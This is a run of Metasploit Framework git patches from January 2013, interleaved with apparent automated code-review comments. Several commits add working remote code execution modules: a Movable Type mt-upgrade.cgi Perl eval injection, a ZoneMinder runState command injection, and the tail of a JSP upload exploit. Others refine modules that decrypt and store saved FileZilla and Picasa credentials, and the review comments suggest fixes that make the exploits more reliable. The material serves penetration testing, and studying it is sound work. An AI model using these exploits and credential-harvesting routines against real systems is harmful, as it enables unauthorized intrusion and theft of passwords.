+ return Exploit::CheckCode::Safe + end + + return Exploit::CheckCode::Vulnerable + end + + def exploit + @peer = "#{rhost}:#{rport}" + @uri = normalize_uri(target_uri.path) + @uri << '/' if @uri[-1,1] != '/' + + # Get Tomcat installation path + print_status("#{@peer} - Retrieving Tomcat installation path...") + install_path = get_install_path + + if install_path.nil? + fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Unable to retrieve the Tomcat installation path") + end + + print_good("#{@peer} - Tomcat installed on #{install_path}") + + if target['Platform'] == "linux" + @location = "#{install_path}webapps/appliance/" + elsif target['Platform'] == "win" + @location = "#{install_path}webapps\\appliance\\" + end + + + # Upload the JSP and the raw payload + @jsp_name = rand_text_alphanumeric(8+rand(8)) + + jspraw = generate_jsp + + # Specify the payload in hex as an extra file.. + payload_hex = payload.encoded_exe.unpack('H*')[0] + + print_status("#{@peer} - Uploading the payload") + + if upload_file(@location, "#{@var_hexfile}.txt", payload_hex) + print_good("#{@peer} - Payload successfully uploaded to #{@location}#{@var_hexfile}.txt") + else + fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Error uploading the Payload") + end + + print_status("#{@peer} - Uploading the payload") + + if upload_file(@location, "#{@jsp_name}.jsp", jspraw) + print_good("#{@peer} - JSP successfully uploaded to #{@location}#{@jsp_name}.jsp") + else + fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Error uploading the jsp") + end + + print_status("Triggering payload at '#{@uri}#{@jsp_name}.jsp' ...") + res = send_request_cgi( + { + 'uri' => "#{@uri}appliance/#{@jsp_name}.jsp", + 'method' => 'GET' + }) + + if res and res.code != 200 + print_warning("#{@peer} - Error triggering the payload") + end + + register_files_for_cleanup("#{@location}#{@var_hexfile}.txt") + register_files_for_cleanup("#{@location}#{@jsp_name}.jsp") + end + +end 
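Review bot: `'DisclosureDate' => 'Jan 17 2012'` does not fit the rest of the metadata, which cites CVE-2013-1359 and is committed in January 2013; it looks like a typo for 2013 and should be checked against the advisory. In `exploit` the status line `Uploading the payload` is printed twice, the second time before the JSP upload, so `print_status("#{@peer} - Uploading the JSP")` would match what actually happens.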
From d6ed6cd5e45cb17698fbaa0c1c177b72583893b9 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Tue, 22 Jan 2013 00:27:03 -0600 Subject: [PATCH 091/421] Fix a stack overflow in bidirectional pipe --- lib/rex/io/bidirectional_pipe.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/lib/rex/io/bidirectional_pipe.rb b/lib/rex/io/bidirectional_pipe.rb index c79ed2771501..d1de67ffcf5c 100644 --- a/lib/rex/io/bidirectional_pipe.rb +++ b/lib/rex/io/bidirectional_pipe.rb @@ -99,7 +99,7 @@ def print_status(msg='') end def print_warning(msg='') - print_warning('[!] ' + msg) + print_line('[!] ' + msg) end # @@ -159,4 +159,3 @@ def pgets end end - From 4740cb09a168219894672a8fae0a532fcbf73b1f Mon Sep 17 00:00:00 2001 From: Raphael Mudge Date: Tue, 22 Jan 2013 02:56:43 -0500 Subject: [PATCH 092/421] Fix NoMethodError if handler has no ParentModule db.rb assumes that multi/handler sessions have a ParentModule defined in their datastore. This assumption breaks when a user sets up a multi/handler by hand to receive a session from another user (e.g., via multi_meter_inject). When db.rb tries to access a member of a nil ParentModule, a stacktrace is dumped to framework.log. --- lib/msf/core/db.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb index a8cfe5543112..7e0bc736bae5 100644 --- a/lib/msf/core/db.rb +++ b/lib/msf/core/db.rb @@ -679,8 +679,8 @@ def report_session(opts) # In the case of multi handler we cannot yet determine the true # exploit responsible. But we can at least show the parent versus # just the generic handler: - if session and session.via_exploit == "exploit/multi/handler" - sess_data[:via_exploit] = sess_data[:datastore]['ParentModule'] + if session and session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule'] + sess_data[:via_exploit] = sess_data[:datastore]['ParentModule'] end s = ::Mdm::Session.new(sess_data) 
@@ -696,9 +696,9 @@ def report_session(opts) mod = framework.modules.create(session.via_exploit) - if session.via_exploit == "exploit/multi/handler" - mod_fullname = sess_data[:datastore]['ParentModule'] - mod_name = ::Mdm::ModuleDetail.find_by_fullname(mod_fullname).name + if session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule'] + mod_fullname = sess_data[:datastore]['ParentModule'] + mod_name = ::Mdm::ModuleDetail.find_by_fullname(mod_fullname).name else mod_name = mod.name mod_fullname = mod.fullname @@ -720,7 +720,7 @@ def report_session(opts) vuln = framework.db.report_vuln(vuln_info) - if session.via_exploit == "exploit/multi/handler" + if session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule'] via_exploit = sess_data[:datastore]['ParentModule'] else via_exploit = session.via_exploit From 08062597b9cb4ff1b39d755a5f4410363becbbac Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 22 Jan 2013 12:07:16 +0100 Subject: [PATCH 093/421] fix data added to table --- modules/post/windows/gather/credentials/filezilla_server.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/windows/gather/credentials/filezilla_server.rb b/modules/post/windows/gather/credentials/filezilla_server.rb index 66da9f2113a0..619b80190e49 100644 --- a/modules/post/windows/gather/credentials/filezilla_server.rb +++ b/modules/post/windows/gather/credentials/filezilla_server.rb @@ -168,7 +168,7 @@ def get_filezilla_creds(paths) perms.each do |perm| permissions << [perm['host'], perm['user'], perm['dir'], perm['fileread'], perm['filewrite'], perm['filedelete'], perm['fileappend'], - perm['dircreate'], perm['dirdelete'], perm['dirlist'], perm['dirsubdirs'], perm['autocreate']] + perm['dircreate'], perm['dirdelete'], perm['dirlist'], perm['dirsubdirs'], perm['autocreate'], perm['home']] end vprint_status(" Collected the following configuration details:") 
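Review bot: `::Mdm::ModuleDetail.find_by_fullname(mod_fullname).name` in the `@@ -696` hunk can still raise NoMethodError. The new guard only covers a missing `ParentModule`, and `find_by_fullname` presumably returns nil when the datastore names a module that has no ModuleDetail row. A guarded lookup keeps the session report from failing on that path: `detail = ::Mdm::ModuleDetail.find_by_fullname(mod_fullname)` followed by `mod_name = detail ? detail.name : mod.name`. The test `session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule']` now appears in three hunks of this commit (`@@ -679`, `@@ -696`, `@@ -720`), so computing it once into a local would keep the copies from drifting apart. `report_session` starts and ends outside these hunks.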
From cd29a88c18482300d06eec75c588ac7aaf0a8f45 Mon Sep 17 00:00:00 2001 From: Kacper Nowak Date: Tue, 22 Jan 2013 11:58:24 +0000 Subject: [PATCH 094/421] added Movable Type 4.2x, 4.3x Web Upgrade Remote Code Execution --- .../multi/http/movabletype_upgrade_exec.rb | 126 ++++++++++++++++++ 1 file changed, 126 insertions(+) create mode 100644 modules/exploits/multi/http/movabletype_upgrade_exec.rb diff --git a/modules/exploits/multi/http/movabletype_upgrade_exec.rb b/modules/exploits/multi/http/movabletype_upgrade_exec.rb new file mode 100644 index 000000000000..1ede21300889 --- /dev/null +++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb 
@@ -0,0 +1,126 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +### +# +# The vulnerability arises due to the following properties: +# +# 1: This script may be invoked remotely without requiring authentication to any MT +# instance. +# +# 2: Through a crafted POST request, it is possible to invoke particular +# database migration functions (i.e functions that bring the existing database +# up-to-date with an updated codebase) by name and with particular parameters. +# +# 3: A particular migration function, core_drop_meta_for_table, allows a class +# parameter to be set which is used directly in a perl eval statement, allowing +# perl code injection. +# +### + +class Metasploit4 < Msf::Exploit::Remote + + include Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Movable Type 4.2x, 4.3x Web Upgrade Remote Code Execution', + 'Description' => %q{ + This module can be used to execute a payload on MoveableType (MT) + thatexposes a CGI script, mt-upgrade.cgi (usually at /mt/mt-upgrade.cgi), + that is used during installation and updating of the platform. 
+ }, + 'Author' => + [ + 'Kacper Nowak', + 'Nick Blundell', + "Gary O'Leary-Steele", + ], + 'References' => + [ + ['CVE', '2012-6315'], + ['URL', 'http://www.sec-1.com/blog/?p=402'], + ], + 'Arch' => ARCH_CMD, + 'Payload' => + { + 'Compat' => + { + 'PayloadType' => 'cmd' + } + }, + 'Platform' => + [ + 'win', + 'unix' + ], + 'Targets' => + [ + ['Movable Type 4.2x, 4.3x', {}] + ], + 'Privileged' => false, + 'DisclosureDate' => "Jan 08 2013", + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('RPATH', [true, 'The URI path of the Movable Type installation', '/mt']) + ], self.class) + end + + def check + @peer = "#{rhost}:#{rport}" + fingerprint = rand_text_alpha(5) + print_status("#{@peer} - Sending check...") + begin + res = http_send_raw(fingerprint) + rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout + return + end + if (res) + if (res.code == 200 and res.body =~ /Can't locate object method \\"dbi_driver\\" via package \\"#{fingerprint}\\" at/) + return Exploit::CheckCode::Vulnerable + elsif (res.code != 200) + return Exploit::CheckCode::Unknown + else + return Exploit::CheckCode::Safe + end + end + end + + def exploit + @peer = "#{rhost}:#{rport}" + print_status("#{@peer} - Sending payload...") + http_send_cmd(payload.encoded) + end + + def http_send_raw(cmd, timeout=20) + path = normalize_uri(datastore['RPATH']) + '/mt-upgrade.cgi' + send_request_cgi( + { + 'uri' => path, + 'method' => 'POST', + 'vars_post' => + { + '__mode' => 'run_actions', + 'installing' => '1', + 'steps' => %{[["core_drop_meta_for_table","class","#{cmd.gsub('"', '\"')}"]]} + } + }, timeout) + end + + def http_send_cmd(cmd) + print_status(cmd) + pay = 'v0;use MIME::Base64;system(decode_base64(q(' + pay << Rex::Text.encode_base64(cmd) + pay << ')));return 0' + print_status(pay) + http_send_raw(pay, 0.5) + end +end From 08a5f467b18524efc4cd259cb2ec796bee703881 Mon Sep 17 00:00:00 2001 
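Review bot: `check` has two paths that return nil instead of a check code: the bare `return` in the `rescue` branch, and the fall-through when `res` is nil. A caller then cannot tell an unreachable host from one that was never tested, so both paths should end with `return Exploit::CheckCode::Unknown`. The info hash also has no `'License' => MSF_LICENSE` entry. The description reads "MoveableType (MT) thatexposes", where "Movable Type (MT) that exposes" would match the module name.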
From: Kacper Nowak Date: Tue, 22 Jan 2013 12:14:38 +0000 Subject: [PATCH 095/421] added URL for developer site --- modules/exploits/multi/http/movabletype_upgrade_exec.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/multi/http/movabletype_upgrade_exec.rb b/modules/exploits/multi/http/movabletype_upgrade_exec.rb index 1ede21300889..a6fc2c99cc6e 100644 --- a/modules/exploits/multi/http/movabletype_upgrade_exec.rb +++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb @@ -46,6 +46,7 @@ def initialize(info = {}) [ ['CVE', '2012-6315'], ['URL', 'http://www.sec-1.com/blog/?p=402'], + ['URL', 'http://www.movabletype.org/2013/01/movable_type_438_patch.html'] ], 'Arch' => ARCH_CMD, 'Payload' => From 970591a85ff1fded9af62b3667e6d3079226f340 Mon Sep 17 00:00:00 2001 From: bcoles Date: Tue, 22 Jan 2013 22:56:50 +1030 Subject: [PATCH 096/421] Add ZoneMinder arbitrary command execution exploit --- .../webapp/zoneminder_packagecontrol_exec.rb | 148 ++++++++++++++++++ 1 file changed, 148 insertions(+) create mode 100644 modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb diff --git a/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb new file mode 100644 index 000000000000..c405327ab0f6 --- /dev/null +++ b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb 
@@ -0,0 +1,148 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => 'ZoneMinder Video Server packageControl Command Execution', + 'Description' => %q{ + This module exploits a command execution vulnerability in ZoneMinder Video + Server version 1.24.0 to 1.25.0 which could be abused to allow + authenticated users to execute arbitrary commands under the context of the + web server user. The 'packageControl' function in the + 'includes/actions.php' file calls 'exec()' with user controlled data + from the 'runState' parameter. + }, + 'References' => + [ + ['URL', 'http://itsecuritysolutions.org/2013-01-22-ZoneMinder-Video-Server-arbitrary-command-execution-vulnerability/'], + ], + 'Author' => + [ + 'Brendan Coles ', # Discovery and exploit + ], + 'License' => MSF_LICENSE, + 'Privileged' => true, + 'Arch' => ARCH_CMD, + 'Platform' => 'unix', + 'Payload' => + { + 'BadChars' => "\x00", + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic telnet python perl bash', + }, + }, + 'Targets' => + [ + ['Automatic Targeting', { 'auto' => true }] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => "Jan 22 2013", + )) + + register_options([ + OptString.new('USERNAME', [true, 'The ZoneMinder username', 'admin']), + OptString.new('PASSWORD', [true, 'The ZoneMinder password', 'admin']), + OptString.new('TARGETURI', [true, 'The path to the web application', '/zm/']) + ], self.class) + end + + def check + + peer = "#{rhost}:#{rport}" + base = target_uri.path + base << '/' if base[-1, 1] != '/' + user = datastore['USERNAME'] + pass = datastore['PASSWORD'] + 
cookie = "ZMSESSID=" + rand_text_alphanumeric(rand(10)+6) + data = "action=login&view=version&username=#{user}&password=#{pass}" + + # login and retrieve software version + print_status("#{peer} - Authenticating as user '#{user}'") + begin + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{base}index.php", + 'cookie' => "#{cookie}", + 'data' => "#{data}", + }) + if res and res.code == 200 + if res.body =~ /ZM - Login<\/title>/ + print_error("#{peer} - Authentication failed") + return Exploit::CheckCode::Unknown + elsif res.body =~ /v1.2(4\.\d+|5\.0)/ + return Exploit::CheckCode::Appears + elsif res.body =~ /<title>ZM/ + return Exploit::CheckCode::Detected + end + end + return Exploit::CheckCode::Safe + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp + print_error("#{peer} - Connection failed") + end + return Exploit::CheckCode::Unknown + + end + + def exploit + + @peer = "#{rhost}:#{rport}" + base = target_uri.path + base << '/' if base[-1, 1] != '/' + cookie = "ZMSESSID=" + rand_text_alphanumeric(rand(10)+6) + user = datastore['USERNAME'] + pass = datastore['PASSWORD'] + data = "action=login&view=postlogin&username=#{user}&password=#{pass}" + command = Rex::Text.uri_encode(payload.encoded) + + # login + print_status("#{@peer} - Authenticating as user '#{user}'") + begin + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{base}index.php", + 'cookie' => "#{cookie}", + 'data' => "#{data}", + }) + if !res or res.code != 200 or res.body =~ /<title>ZM - Login<\/title>/ + fail_with(Exploit::Failure::NoAccess, "#{@peer} - Authentication failed") + end + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") + end + print_good("#{@peer} - Authenticated successfully") + + # send payload + print_status("#{@peer} - Sending payload (#{command.length} bytes)") + begin + res = send_request_cgi({ + 'method' => 'POST', + 
'uri' => "#{base}index.php", + 'data' => "view=none&action=state&runState=start;#{command}%26", + 'cookie' => "#{cookie}" + }) + if res and res.code == 200 + print_good("#{@peer} - Payload sent successfully") + else + fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Sending payload failed") + end + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") + end + + end + +end + From 8a59c7b8fb406dc9361545c7c8399de45da18605 Mon Sep 17 00:00:00 2001 From: Kacper Nowak <kacper.p.nowak@gmail.com> Date: Tue, 22 Jan 2013 12:31:40 +0000 Subject: [PATCH 097/421] removed extra print_status() calls --- modules/exploits/multi/http/movabletype_upgrade_exec.rb | 2 -- 1 file changed, 2 deletions(-) diff --git a/modules/exploits/multi/http/movabletype_upgrade_exec.rb b/modules/exploits/multi/http/movabletype_upgrade_exec.rb index a6fc2c99cc6e..40764c27b971 100644 --- a/modules/exploits/multi/http/movabletype_upgrade_exec.rb +++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb @@ -117,11 +117,9 @@ def http_send_raw(cmd, timeout=20) end def http_send_cmd(cmd) - print_status(cmd) pay = 'v0;use MIME::Base64;system(decode_base64(q(' pay << Rex::Text.encode_base64(cmd) pay << ')));return 0' - print_status(pay) http_send_raw(pay, 0.5) end end From 20b36cdf7a7039007ec96fc122bdb3da7cd2da0d Mon Sep 17 00:00:00 2001 From: Robin Wood <robin@digininja.org> Date: Tue, 22 Jan 2013 15:42:23 +0000 Subject: [PATCH 098/421] added extra checking for strict databases --- modules/auxiliary/scanner/mysql/mysql_file_enum.rb | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb index 09374fc9d1dc..8d371f10ee12 100644 --- a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb +++ b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb 
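Review bot: The `rescue` list in `check` names `::Rex::ConnectionTimeoutp`, a typo for the `::Rex::ConnectionTimeout` used in `exploit`. When a timeout reaches that clause, resolving the constant would raise NameError instead of printing "Connection failed" and returning `Unknown`. The line should read `rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout`. Separately, `USERNAME` and `PASSWORD` are interpolated into the POST body unencoded in both `check` and `exploit`, so a password containing `&`, `=` or `%` is sent wrong and a valid account looks like a failed login. Passing them through `Rex::Text.uri_encode`, which this file already uses for the command, avoids that.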
@@ -99,6 +99,16 @@ def check_dir dir :proto => 'tcp', :update => :unique_data ) + rescue ::RbMysql::DataTooLong, ::RbMysql::TruncatedWrongValueForField + print_good("#{peer} - #{dir} is a file and exists") + report_note( + :host => rhost, + :type => "filesystem.file", + :data => "#{dir} is a file and exists", + :port => rport, + :proto => 'tcp', + :update => :unique_data + ) rescue ::RbMysql::ServerError vprint_warning("#{peer} - #{dir} does not exist") rescue ::RbMysql::Error => e From fed4a836c634323c841ae1e127fec2cb6a8c2b26 Mon Sep 17 00:00:00 2001 From: Tasos Laskos <Tasos_Laskos@rapid7.com> Date: Tue, 22 Jan 2013 20:29:57 +0200 Subject: [PATCH 099/421] Updated proof string for Web Differential Analysis Manipulatable responses => Boolean manipulation --- lib/msf/core/auxiliary/web/analysis/differential.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/auxiliary/web/analysis/differential.rb b/lib/msf/core/auxiliary/web/analysis/differential.rb index 7ba764ed5c17..ee3c0c8aea98 100644 --- a/lib/msf/core/auxiliary/web/analysis/differential.rb +++ b/lib/msf/core/auxiliary/web/analysis/differential.rb @@ -122,7 +122,7 @@ def differential_analysis( opts = {}, &block ) http.if_not_custom_404( action, res['res'].body ) do # if this isn't a custom 404 page then it means that # the element is vulnerable, so go ahead and log the issue - fuzzer.process_vulnerability( res['elem'], 'Manipulatable responses.', + fuzzer.process_vulnerability( res['elem'], 'Boolean manipulation.', :payload => res['elem'].altered_value ) end end From 9671df44886b09db0fca58bb879b49f371f71abe Mon Sep 17 00:00:00 2001 
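Review bot: The new `rescue ::RbMysql::DataTooLong, ::RbMysql::TruncatedWrongValueForField` branch has no comment saying why these two errors are reported as "is a file and exists". A short comment such as `# strict SQL mode: the server read the path but rejected its contents, so it exists` would explain the branch, though the wording needs confirming against the query, which is outside the hunk. The `report_note` call added here also appears to repeat the one whose tail is visible in the context lines just above, so moving the shared reporting into a small helper would keep the two notes identical. `check_dir` starts before the hunk.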
From: Charles Smith <charles.smith@n2netsec.com> Date: Tue, 22 Jan 2013 15:46:47 -0500 Subject: [PATCH 100/421] Picasa 2 credentials are now also saved as loot This module used to save only Picasa 3 credentials as loot. Picasa 2 creds were displayed, but not saved. I've updated the module to save Picasa 2 credentials, and I also updated the output code to use print_good instead of print_status. --- .../gather/credentials/enum_picasa_pwds.rb | 62 +++++++++++-------- 1 file changed, 36 insertions(+), 26 deletions(-) diff --git a/modules/post/windows/gather/credentials/enum_picasa_pwds.rb b/modules/post/windows/gather/credentials/enum_picasa_pwds.rb index ff188cd1411c..5ec210987d0b 100644 --- a/modules/post/windows/gather/credentials/enum_picasa_pwds.rb +++ b/modules/post/windows/gather/credentials/enum_picasa_pwds.rb @@ -70,8 +70,7 @@ def decrypt_password(data) end def get_registry - psecrets = "" - + begin print_status("Looking in registry for stored login passwords by Picasa ...") @@ -80,15 +79,28 @@ def get_registry password = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\", 'GaiaPass') - if username != nil and password != nil + credentials = Rex::Ui::Text::Table.new( + 'Header' => "Picasa Credentials", + 'Indent' => 1, + 'Columns' => + [ + "User", + "Password" + ]) + + + foundcreds = 0 + if username != nil and password != nil passbin = [password].pack("H*") pass = decrypt_password(passbin) if pass != nil - print_status("Username: #{username}") - print_status("Password: #{pass}") - secret = "#{username}:#{pass}" - psecrets << secret + print_status("Found Picasa 2 credentials.") + print_good("Username: #{username}\t Password: #{pass}") + + foundcreds = 1 + credentials << [username,pass] + end end 
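Review bot: `foundcreds` is an integer used as a flag: it is set to `0` in the `@@ -80` hunk, to `1` in both credential branches, and tested with `if foundcreds == 1` in the `@@ -98` hunk. A boolean reads more directly and cannot take other values: `foundcreds = false`, `foundcreds = true`, `if foundcreds`. `get_registry` starts and ends outside these hunks.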
@@ -98,35 +110,33 @@ def get_registry password = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\", 'GaiaPass') - credentials = Rex::Ui::Text::Table.new( - 'Header' => "Picasa Credentials", - 'Indent' => 1, - 'Columns' => - [ - "User", - "Password" - ]) if username != nil and password != nil passbin = [password].pack("H*") pass = decrypt_password(passbin) if pass != nil - print_status("Username: #{username}") - print_status("Password: #{pass}") + print_status("Found Picasa 3 credentials.") + print_good("Username: #{username}\t Password: #{pass}") + foundcreds = 1 credentials << [username,pass] - path = store_loot( - "picasa.creds", - "text/csv", - session, - credentials.to_csv, - "decrypted_picasa_data.csv", - "Decrypted Picasa Passwords") - - print_status("Decrypted passwords saved in: #{path}") end end + + if foundcreds == 1 + path = store_loot( + "picasa.creds", + "text/csv", + session, + credentials.to_csv, + "decrypted_picasa_data.csv", + "Decrypted Picasa Passwords") + + print_status("Decrypted passwords saved in: #{path}") + else + print_status("No Picasa credentials found.") + end rescue ::Exception => e print_error("An error has occurred: #{e.to_s}") From f2beb5bf19ffbc28f6c41b05d0cf801a0aa29f10 Mon Sep 17 00:00:00 2001 From: Tasos Laskos <Tasos_Laskos@rapid7.com> Date: Tue, 22 Jan 2013 23:39:16 +0200 Subject: [PATCH 101/421] Auxiliary::Web#process_vulnerability: payload fix Updated to pick the largest matching payload from the payload list. --- lib/msf/core/auxiliary/web.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/lib/msf/core/auxiliary/web.rb b/lib/msf/core/auxiliary/web.rb index b91b7536f12d..a707e6a4ae1b 100644 --- a/lib/msf/core/auxiliary/web.rb +++ b/lib/msf/core/auxiliary/web.rb 
@@ -250,7 +250,9 @@ def process_vulnerability( element, proof, opts = {} ) if !(payload = opts[:payload]) if payloads - payload = payloads.select{ |p| element.altered_value.include?( p ) }.first + payload = payloads. + select { |p| element.altered_value.include?( p ) }. + sort_by { |p| p.size }.last end end From 0d564c1ce8ac0578bfb2cf582aced1d7e71cdaa7 Mon Sep 17 00:00:00 2001 From: Tasos Laskos <Tasos_Laskos@rapid7.com> Date: Tue, 22 Jan 2013 23:40:30 +0200 Subject: [PATCH 102/421] Auxiliary::Web::Analysis::Timing Updated to pick the largest matching payload from the payload list. --- lib/msf/core/auxiliary/web/analysis/timing.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/lib/msf/core/auxiliary/web/analysis/timing.rb b/lib/msf/core/auxiliary/web/analysis/timing.rb index 9d6b3e564745..32608cf07745 100644 --- a/lib/msf/core/auxiliary/web/analysis/timing.rb +++ b/lib/msf/core/auxiliary/web/analysis/timing.rb @@ -54,7 +54,8 @@ def timeout_analysis( opts = {} ) timeout = opts[:delay] seed = p.altered_value.dup - payload = fuzzer.payloads.select{ |pl| seed.include?( pl ) }.first + payload = fuzzer.payloads.select{ |pl| seed.include?( pl ) }. + sort_by { |p2| p2.size }.last # 1st pass, make sure the webapp is responsive if_responsive do From 6b5c6c3a0cb5ab92a0aed63b178498ab46da7e1c Mon Sep 17 00:00:00 2001 From: Tasos Laskos <Tasos_Laskos@rapid7.com> Date: Tue, 22 Jan 2013 23:41:36 +0200 Subject: [PATCH 103/421] Auxiliary::Web::Analysis::Differential Removed payload option from #process_vulnerability call --- lib/msf/core/auxiliary/web/analysis/differential.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/auxiliary/web/analysis/differential.rb b/lib/msf/core/auxiliary/web/analysis/differential.rb index ee3c0c8aea98..0d53c1236bc9 100644 --- a/lib/msf/core/auxiliary/web/analysis/differential.rb +++ b/lib/msf/core/auxiliary/web/analysis/differential.rb 
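Review bot: `select { ... }.sort_by { |p| p.size }.last` sorts every matching payload just to pick one, where `max_by` states the intent directly: `payload = payloads.select { |p| element.altered_value.include?( p ) }.max_by { |p| p.size }`. The same applies to the `timeout_analysis` hunk in `lib/msf/core/auxiliary/web/analysis/timing.rb`. With payloads of equal length the two forms may pick a different element, so if that order matters it should be stated in a comment. A one-line comment on why the longest match is preferred would also help, presumably because a shorter payload can be a substring of the one actually injected.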
@@ -101,7 +101,7 @@ def differential_analysis( opts = {}, &block ) # save the response and some data for analysis responses[:good][elem.altered] << { 'res' => res, - 'elem' => elem + 'elem' => elem.dup } end end @@ -122,8 +122,7 @@ def differential_analysis( opts = {}, &block ) http.if_not_custom_404( action, res['res'].body ) do # if this isn't a custom 404 page then it means that # the element is vulnerable, so go ahead and log the issue - fuzzer.process_vulnerability( res['elem'], 'Boolean manipulation.', - :payload => res['elem'].altered_value ) + fuzzer.process_vulnerability( res['elem'], 'Boolean manipulation.' ) end end end From 8c86c49d43c871d5e1e753f47f343e8483c141dd Mon Sep 17 00:00:00 2001 
From: Raphael Mudge <rsmudge@gmail.com> Date: Tue, 22 Jan 2013 22:48:16 -0500 Subject: [PATCH 104/421] Armitage 01.23.13 This update to Armitage adds the ability to assign labels to hosts and create dynamic workspaces based on these labels. This update also adds helpers to configure USERNAME/PASSWORD options and EXE::Custom and EXE::Template. Several bugs were fixed as well. --- data/armitage/armitage.jar | Bin 3198776 -> 3201422 bytes data/armitage/cortana.jar | Bin 3198920 -> 3201417 bytes data/armitage/whatsnew.txt | 26 ++++ external/source/armitage/build.xml | 2 + external/source/armitage/resources/about.html | 2 +- .../armitage/resources/msfconsole.style | 1 + .../source/armitage/resources/msfrpcd_new.bat | 12 ++ .../armitage/scripts-cortana/cortanadb.sl | 27 +++- .../armitage/scripts-cortana/internal.sl | 21 ++- external/source/armitage/scripts/armitage.sl | 10 +- external/source/armitage/scripts/attacks.sl | 8 + external/source/armitage/scripts/gui.sl | 2 +- external/source/armitage/scripts/jobs.sl | 67 +-------- external/source/armitage/scripts/menus.sl | 23 +++ external/source/armitage/scripts/passhash.sl | 31 ++++ external/source/armitage/scripts/server.sl | 3 - external/source/armitage/scripts/targets.sl | 12 +- external/source/armitage/scripts/util.sl | 16 +- .../source/armitage/scripts/workspaces.sl | 23 +-- .../src/armitage/ArmitageApplication.java | 1 + .../source/armitage/src/cortana/Loader.java | 5 +- .../source/armitage/src/cortana/Main.java | 2 +- .../armitage/src/graph/NetworkGraph.java | 15 +- .../source/armitage/src/msf/DatabaseImpl.java | 142 +++++++++++++++++- .../source/armitage/src/msf/RpcCacheImpl.java | 2 + .../armitage/src/table/NetworkTable.java | 16 +- external/source/armitage/src/ui/ATable.java | 6 + .../source/armitage/src/ui/ZoomableImage.java | 2 + external/source/armitage/whatsnew.txt | 26 ++++ 29 files changed, 385 insertions(+), 118 deletions(-) create mode 100644 external/source/armitage/resources/msfrpcd_new.bat
